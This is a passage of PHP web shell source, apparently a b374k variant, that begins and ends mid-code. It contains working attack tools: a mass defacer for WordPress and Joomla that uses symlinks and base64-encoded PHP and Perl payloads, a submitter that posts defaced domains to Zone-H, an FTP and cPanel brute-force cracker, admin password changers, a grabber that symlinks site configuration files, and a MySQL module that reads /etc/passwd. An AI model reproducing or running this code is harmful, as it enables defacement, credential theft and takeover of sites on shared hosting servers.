";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html','a+');$_SESSION['count1'] = (isset($_GET['st']) &&$_GET['st']!='') ?(isset($_SESSION['count1']) ?$_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) &&$_GET['st']!='') ?(isset($_SESSION['count2']) ?$_SESSION['count2'] :0 ) : 0;echo '';$j = 1;$st = (isset($_GET['st']) &&$_GET['st']!='') ?$_GET['st'] : 0;for($i = $st;$i <= $numero_dominios;$i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j %2 == 0) ?'class="even"': 'class="odd"';if($config01 &&preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01,$def,$domain);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$_SESSION['count1'] = $_SESSION['count1'] +1;}else {echo '';}echo '';}if($config02 &&preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02,$dd);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$_SESSION['count2'] = $_SESSION['count2'] +1;}else {echo '';}echo '';}$cls = ($j %2 == 0) ?'class="even"': 'class="odd"';if($config03 &&preg_match('/DB_NAME/i',$config03)){echo '';echo '';$res = index_changer_wp($config03,$dd);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$_SESSION['count2'] = $_SESSION['count2'] +1;}else {echo '';}echo '';}}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.$i.''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$i.''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
'.($j++).''.$i.''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')
';echo 'View Total Defaced urls
';if($_SESSION['count1']+$_SESSION['count2'] >0){echo 'Send to Zone-H';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/',$domains,$out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num

");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html','a+');$defaced = '';$count1 = 0;$count2 = 0;echo '';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc',base64_decode($dt));chmod('plsym/plsym.cc',0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .cc AddHandler cgi-script .cc AddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp,$wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('//',$data,$match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j %2 == 0) ?'class="even"': 'class="odd"';if($config01 &&preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01,$def,$domain);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count1++;}else {echo '';}echo '';}if($config02 &&preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02,$def);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count2++;}else {echo '';}echo '';}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.$i++.''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';echo 'View Total Defaced urls
';if($count1+$count2 >0){echo 'Send to Zone-H';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/',$domains,$out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num

");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html','a+');$defaced = '';$count1 = 0;$count2 = 0;echo '';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt',$_POST['man_data']);file_put_contents('plsym/plsym.cc',base64_decode($dt));chmod('plsym/plsym.cc',0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .cc AddHandler cgi-script .cc AddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp,$wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('//',$data,$match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j %2 == 0) ?'class="even"': 'class="odd"';if($config01 &&preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01,$def,$domain);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count1++;}else {echo '';}echo '';}if($config02 &&preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02,$def);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count2++;}else {echo '';}echo '';}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.($i++).''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';echo 'View Total Defaced urls
';if($count1+$count2 >0){echo 'Send to Zone-H';}}echo '

Wordpress and Joomla Mass Defacer

';if(!isset($_POST['form_action']) &&!isset($_GET['mode'])){echo '
using /etc/named.conf ('.(is_readable('/etc/named.conf')?'READABLE':'NOT READABLE').')
using /etc/passwd ('.(is_readable('/etc/passwd')?'READABLE':'NOT READABLE').')
manual copy of /etc/passwd

index url:
';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) {exec_mode_1($milaf_el_index);}if($_POST['mode']==2) {exec_mode_2($milaf_el_index);}if($_POST['mode']==3) {exec_mode_3($milaf_el_index);}}if($_GET['mode']==1) {exec_mode_1($milaf_el_index);}echo '';} elseif(isset($_GET['x']) &&($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR ";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip',1);}@ini_set('zlib.output_compression',0);@ini_set('implicit_flush',1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode(" ",$_POST['domains']);}if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);} echo "

";
if(!isset($_POST['defacer'])){
echo "
Zone-H Poster
Defacer :
Domains:
 
OR
Submit form .txt file:



";
}$defacer=$_POST['defacer'];if(!$sites){echo '
';exit;}$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);echo "[+] Total unique domain: $total ";$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';echo " ";}}$d=$n+30;if($d>$total){$d=$total;}echo "=====================>[$d/$total] ";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT =>'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER =>true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING =>true,CURLOPT_HEADER =>false,CURLOPT_HTTPHEADER =>array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT =>3,CURLOPT_URL =>'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS =>$posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running >0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main,$http[$m]);$code = curl_getinfo($http[$m],CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo' [-]Error!....Retrying';echo " ";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m],CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() -$start;echo 'Done';echo " [*]Time: $end seconds ";curl_multi_close($main);if($cli==0){echo '';}exit;} elseif(isset($_GET['x']) &&($_GET['x'] == 'brute')){$connect_timeout=5; set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype'];if($target == ""){$target = "localhost";};echo '

';function ftp_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch,CURLOPT_URL,"ftp://$host");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);curl_setopt($ch,CURLOPT_FTPLISTONLY,1);curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);curl_setopt($ch,CURLOPT_FAILONERROR,1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "Connection Timed out";exit;}elseif ( curl_errno($ch) == 0 ){print "
Username ($user) | Password ($pass)
";}curl_close($ch);}function cpanel_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch,CURLOPT_URL,"http://$host:2082");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);curl_setopt($ch,CURLOPT_FAILONERROR,1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "Connection Timed out";exit;}elseif ( curl_errno($ch) == 0 ){print "
[+]Username ($user) | Password ($pass)
";}curl_close($ch);}if(isset($submit) &&!empty($submit)){if(empty($users) &&empty($pass)){print "

Error : Check The Users and Password List

";exit;}if(empty($users)){print "

Error :Check The Users List

";exit;}if(empty($pass) ){print "

Error :Check The Password List

";exit;};$userlist=explode(" ",$users);$passlist=explode(" ",$pass);print "[~] Wait ...

";foreach ($userlist as $user) {$pureuser = trim($user);foreach ($passlist as $password ) {$purepass = trim($password);if($cracktype == "ftp"){ftp_check($target,$pureuser,$purepass,$connect_timeout);}if ($cracktype == "cpanel"){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}} echo "

The Cracker


IP :

userspasswords

Cpanel(2082)Ftp (21)


";die();} elseif(isset($_GET['x']) &&($_GET['x'] == 'joomla')){if(empty($_POST['pwd'])){echo "


Joomla login changer




DB_Prefix :   host :   database :   username :   password :  
  
New Username:  

New Password:  

  
";}else {$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$admin = $_POST['admin'];$pd = ($_POST["pwd"]);$pwd = md5($pd);@mysql_connect($localhost,$username,$password) or die (mysql_error());@mysql_select_db($database) or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());if($SQL) echo "

Done... go and login

";}} elseif(isset($_GET['x']) &&($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost']) &&isset($_GET['sqluser']) &&isset($_GET['sqlpass']) &&isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "
";$msg .= "

Connected to ".$sqluser."@".$sqlhost.":".$sqlport;$msg .= "  ->  [ databases ]";if(isset($_GET['db'])) $msg .= "  ->  ".htmlspecialchars($_GET['db'])."";if(isset($_GET['table'])) $msg .= "  ->  ".htmlspecialchars($_GET['table'])."";$msg .= "

version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."

";$msg .= "
";echo $msg;if(isset($_GET['db']) &&(!isset($_GET['table'])) &&(!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table; CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL ); LOAD DATA INFILE '/etc/passwd' INTO TABLE b374k_table;SELECT * FROM b374k_table; DROP TABLE IF EXISTS b374k_table;";$msg = "

";$tables = array();$msg .= "";$hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);}@sort($tables); foreach($tables as $table){$msg .= "";}$msg .= "
available tables on ".$db."
$table
";} elseif(isset($_GET['table']) &&(!isset($_GET['sqlquery']))){ $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "

";$columns = array();$msg = "";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "";$kolum = $column;}$msg .= "";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page -1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){$msg .= "";foreach($datas as $data){if(trim($data) == "") $data = " ";$msg .= "";}$msg .= "";}$msg .= "
$column
$data
";$head = "
Page
";$msg = $msgq.$head.$msg;} elseif(isset($_GET['submitquery']) &&($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']); $msg = "

";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query); if($hasil){$msg .= "

".$query.";   [ ok ]

";$msg .= ""; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "";$msg .= "";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "";for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j];$msg .= "";}$msg .= "";}$msg .= "
".htmlspecialchars(@mysql_field_name($hasil,$i))."
".$dataz."
";} else $msg .= "

".$query.";   [ error ]

";}}} else {$query = "SHOW PROCESSLIST; SHOW VARIABLES; SHOW STATUS;";$msg = "

";$dbs = array();$msg .= "";$hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);}@sort($dbs);foreach($dbs as $db){ $msg .= "";}$msg .= "
available databases
$db
";} @mysql_close($con);}else $msg = "

can't connect

";echo $msg;}else{;echo '

MySQL Connect

Connection Form
  Host
  Username
  Password
  Port 
';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'configs')) {;echo '

';if (empty($_POST['conf'])) {;echo '

Configs Grabber


/etc/passwd content




';}if ($_POST['conf']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('Symlink is disabled :( ');}@mkdir('configs',0755);@chdir('configs');$htaccess=" Options all Options +Indexes Options +FollowSymLinks DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any ";file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode(" ",$passwd);echo "
wait ...
";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-wp13-wordpress-beta.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo 'Done -> configs';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'config')){error_reporting(0);if ($_POST['kill']) {$url = $_POST['url'];$user = $_POST['user'];$pass =$_POST['pass'];$pss = md5($pass);function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}$config = file_get_contents($url);$password = enter($config,"define('DB_PASSWORD', '","');");$username = enter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME', '","');");$prefix = enter($config,'$table_prefix = \'',"';");$host = enter($config,"define('DB_HOST', '","');");if($config &&preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");if ($query) {echo '

Done !


siteuserpasswordlink
'.$site_url.''.$user.''.$pass.'login
';}else echo '

ERROR !

';}else die('

Not a wordpress config

');}else {;echo '


Wordpress login changer ( symlink version )



config link : 
new user : 
new password : 

';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'domains')){echo "

Domains and Users

";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("
Error : i can't read [ /etc/named.conf ]
");}echo '';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#',$d0main,$domains);flush();if(strlen(trim($domains[1][0])) >2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "";flush();}}}echo'';} elseif(isset($_GET['x']) &&($_GET['x'] == 'keyboard')){if(empty($_POST['pwd'])){echo "

Wordpress login changer

DB_Prefix :   host :   database :   username :   password :   

New username :

New password :
  
";}else{$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];$username= $_POST['username'];$password= $_POST['password'];$pwd= $_POST['pwd'];$admin= $_POST['admin'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url=$data["option_value"];$k2=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());$k2=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());if($k2){echo '

Done ... -> Login

';}}echo '';} elseif(isset($_GET['x']) &&($_GET['x'] == 'string')){$text = $_POST['code'];;echo '


String encoder




 ';$op = $_POST["ope"];switch ($op) {case 'base64': $codi=base64_encode($text);break;case 'md5': $codi=md5($text);break;case 'whash': $codi=crypt($text);break;case 'SHA1': $codi=sha1($text);break;case 'urlencode': $codi=urlencode($text);break;case 'md4': $codi=hash("md4",$text);break;case 'SHA256': $codi=hash("sha256",$text);break;default:break;}echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'phpinfo')){@ob_start();eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"")+6;$akhir = strpos($buff,"");echo "
".substr($buff,$awal,$akhir-$awal)."
";} elseif(isset($_GET['view']) &&($_GET['view'] != "")){if(is_file($_GET['view'])){if(!isset($file))$file = magicboom($_GET['view']);if(!$win &&$posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']." : ".$group['name'];}else {$owner = $user;}$filn = basename($file);echo "
Domainsusers
".$domains[1][0]."".$user['name']."
Filename".$file."
Size".ukuran($file)."
Permission".get_perms($file)."
Owner".$owner."
Create time".date("d-M-Y H:i",@filectime($file))."
